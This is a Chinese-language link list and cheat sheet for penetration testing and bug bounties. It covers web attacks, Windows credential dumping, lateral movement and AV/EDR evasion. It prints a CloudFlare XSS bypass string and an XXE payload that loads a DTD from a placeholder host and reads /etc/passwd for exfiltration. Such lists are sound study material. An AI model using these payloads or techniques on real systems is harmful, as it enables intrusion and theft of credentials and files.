web

tools—tips

• nmap使用技巧

协议层攻击

• # HTTP请求走私– 5个实用技巧

XSS

• Finding DOMXSS with DevTools | Untrusted Types视频工具
• CloudFlare XSS Bypass:

  <svg onload=alert%26%230000000040"1")>

SQL

• 手工注入(mysql,Oracle,SQLServer)
• MSSQL DNS 外带数据

XXE

• XXE盲注
• how to find xxe
• basic payload

<!DOCTYPE test [<!ENTITY % xxe SYSTEM "http://youripaddress.com"> %xxe; ]>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % ext "<!ENTITY exfil SYSTEM 'file:///%file;'>">

SSRF

1. 在大多数浏览器中，该工具支持通过TLS进行通用SSRF以及通过图像标签进行CSRF的工具。目标类似于SNI注入，但是这种新方法使用TLS的固有行为，而不是依赖于特定实现中的错误。

bypass类型文章

1. Web应用程序防火墙（WAF）规避技术＃3

逻辑漏洞

IDOR

1. IDOR –技巧和窍门

Password-reset

1. 10-Password-reset-flaws

TOOLS

1. Arjun

模板注入[SSTI]

1. ASP.NET Razor中的服务器端模板注入（SSTI）-in-ASP.NET-Razor/)

nodejs-rce-LFR

https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/

1. 如果目标正在响应X-Powered-By: Express并且响应中包含HTML，则很有可能正在使用具有服务器端模板的NodeJ。
2. 将layout您的参数发现/模糊词表添加到GET查询或POST正文中。
3. 如果以任意值layout添加参数导致500 Internal Server Error与ENOENT: no such file or directory身体，你已经打了LFR。

Twitter上的tips

1. 赏金黑客渗透技巧 漏洞赏金技巧七 原文 翻译
2. 漏洞赏金技巧六 翻译

信息搜集的小妙招

• 如何从任何网站的所有HTML元素中提取url，srcs和hrefs https://twitter.com/omespino/status/1318605084989837312

   urls = []
$$('*').forEach(element => {
  urls.push(element.src)
  urls.push(element.href)
  urls.push(element.url)
}); console.log(...new Set(urls))

代码审计

Java

反序列化

• Java反序列化备忘单

内网

windows

信息搜集

• WinPWN内部渗透测试过程（侦察和开发），并且出于代理的原因，我编写了具有自动代理识别和集成功能的脚本。
• WADComs是一个交互式备忘单，其中包含精选的攻击性安全工具及其各自的命令，可用于Windows / AD环境。

密码抓取

• 利用易受攻击的驱动程序通过Mimikatz读取Lsass
• 失落但未被遗忘的故事，未记录的NETSYNC
• 在Active Directory中查找已拥有的密码
• 密码转储备忘单：Windows
• 自动登录抓取密码DecryptAutoLogon
• Credential Dumping Cheatsheet凭证转储备忘单
• 做ntlm中继
• 利用.NET5 dump lsass

权限提升

• 查找缺失的、可以利用的补丁
• PsExec本地特权升级
• 提权枚举脚本

免杀

• phra大佬PE Packer 免杀 https://github.com/phra/PEzor#usage
• 掩日免杀 - Advanced AV Evasion Tool For Red Team Ops 用于快速生成免杀的 EXE 可执行文件。
• OffensiveNim 工具的使用教程
• 撤销和规避EDR指南
• bypass方法总结
• 围绕EDR绕过而设计的有效负载创建框架
• 安全模式绕过AV / EDR
• 隐藏修改注册表

各种Loader

• COFFLoader

横向移动

• AD折衷后工具包
• 使用ADWS作为NTLM relay NTLM relay of ADWS (WCF) connections with Impacket
• 包含Windows Active Directory的常见枚举和攻击方法备忘录
• 红队队员的AZURE AD
• WinRM横向移动的另一种方法
• Wmi横向介绍
• 使用IPC内部
• MSSQL横向移动

权限维持

• 利用Microsoft Office
• windows 维权

提取类漏洞收集

1. https://github.com/Al1ex/Heptagram/tree/master/Windows/Elevation
2. Windows exploits提权漏洞合集，附带编译环境，演示GIF图，漏洞详细信息，可执行文件

Linux

• GTFOBins是一个精选的Unix二进制列表，攻击者可以利用它来绕过本地安全限制。

一些学习的综合库

• 国外测试人员的笔记Six2dez
• 技巧HackTricks
• 国内的一些知识点蚂蚁宝库qianxiao996
• 国内Web安全学习笔记LyleMi
• 有部分漏洞的POCXinian-Virus-Wiki
• Red Team
• redteam.cafe
• hacktricks
• blog c#、bypass
• Bug Bounty tips
• build c2 in c++
• C#编写提权工具等博客
• Cobalt-Strike 相关的一些工具以及使用 Tips

blog

• NVISO实验室
• Offensive Defence 主要是bypassAV
• Hacking Articles 国外不错的博客
• SHAWAR KHAN 安全研究员| 的红色团队成员 synackredteam 渗透测试文章

面试

• 夜莺大佬的博客
• 谷歌安全工程师

linux tips

• starnight_cyber的博客日常小技巧